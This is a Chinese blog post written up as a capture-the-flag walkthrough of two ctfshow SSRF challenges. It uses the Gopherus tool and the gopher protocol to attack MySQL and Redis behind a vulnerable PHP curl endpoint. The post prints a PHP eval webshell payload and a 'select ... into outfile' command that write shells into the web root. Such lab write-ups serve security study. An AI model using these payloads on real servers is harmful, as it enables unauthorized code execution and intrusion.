ctfshow web入门ssrf359,360

博主： xiaolong
发布时间：2021 年 02 月 06 日
3634 次浏览
暂无评论
1004字数
分类：技术

记录一下做法，原理啥的还有点懵

web359

打开是登录框，先随便输点什么，然后抓包
发现有个returl参数，并且可以随意更改url，这应该就是我们的利用点了

然后就是gopher协议打mysql,这里用到这个工具gopherus

python gopherus.py --exploit mysql

生成一句话木马

select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/2.php';

在这里插入图片描述

记得把_后面那一大段内容再url编码一次，发送

在这里插入图片描述

访问2.php,cat一下

在这里插入图片描述

web160

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

跟上题一样，只不过换成打redis

python gopherus.py --exploit redis

生成一句话木马

<?php eval($_POST['cmd']);?>

在这里插入图片描述

同样后面那一大段东西要url编码后发送

在这里插入图片描述

然后访问shell.php(默认生成就是shell.php)

在这里插入图片描述

最后修改：2023 年 12 月 15 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

KEKKJ
路过，但是看到博主没事真的太好了，虽然人和人无法共情，但是真心...
Que
刚才十几个人担心博主，看到没事真太好了喵~
快帆云
你好，我们的机场：快帆云，已经稳定运营三年多，现在诚邀推广员。...
无名博客
你好，请问封面图片可以借图吗？
无名博客
okok

ctfshow web入门ssrf359,360

xiaolong • 2021 年 02 月 06 日

记录一下做法，原理啥的还有点懵<h2>web359</h2>打开是登录框，先随便输点什么，然后抓包 发现有个returl参数，并且可以随意更改url，这应该就是我们的利用点了<img src="https://oss.xiaolong22333.top/20210206162154858.png" alt="" title="" style="">然后就是gopher协议打mysql,这里用到这个工具<a class="no-external-link" href="https://github.com/tarunkant/Gopherus" target="_blank">gopherus</a><pre><code>python gopherus.py --exploit mysql</code></pre>生成一句话木马<pre><code>select &quot;&lt;?php @eval($_POST['cmd']);?&gt;&quot; into outfile '/var/www/html/2.php';</code></pre><img src="https://oss.xiaolong22333.top/20210206163407411.png" alt="在这里插入图片描述" title="在这里插入图片描述" style="">记得把<code>_</code>后面那一大段内容再url编码一次，发送<img src="https://oss.xiaolong22333.top/20210206164020380.png" alt="在这里插入图片描述" title="在这里插入图片描述" style="">访问<code>2.php</code>,cat一下<img src="https://oss.xiaolong22333.top/20210206164132720.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><h2>web160</h2><pre><code> &lt;?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?&gt; </code></pre>跟上题一样，只不过换成打redis<pre><code>python gopherus.py --exploit redis</code></pre>生成一句话木马<pre><code>&lt;?php eval($_POST['cmd']);?&gt;</code></pre><img src="https://oss.xiaolong22333.top/20210206164825847.png" alt="在这里插入图片描述" title="在这里插入图片描述" style="">同样后面那一大段东西要url编码后发送<img src="https://oss.xiaolong22333.top/20210206165323652.png" alt="在这里插入图片描述" title="在这里插入图片描述" style="">然后访问<code>shell.php</code>(默认生成就是shell.php)<img src="https://oss.xiaolong22333.top/20210206165539717.png" alt="在这里插入图片描述" title="在这里插入图片描述" style="">

ctfshow web入门ssrf359,360

web359

web160

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

BUUCTF刷题记录(持续更新中~)（更新：断更了~~）

这里是文章目录

CTF中非主流PHP文件包含

php死亡exit()绕过

常见的文件头识别和修复

学校***网站getshell

dompdf-rce漏洞复现

从一道sql注入题认识sql一句话木马

ctfshow php特性系列

菜鸡杯CTFshow部分wp

ctfshow web入门ssrf359,360

web359

web160

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

ctfshow web入门ssrf359,360

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款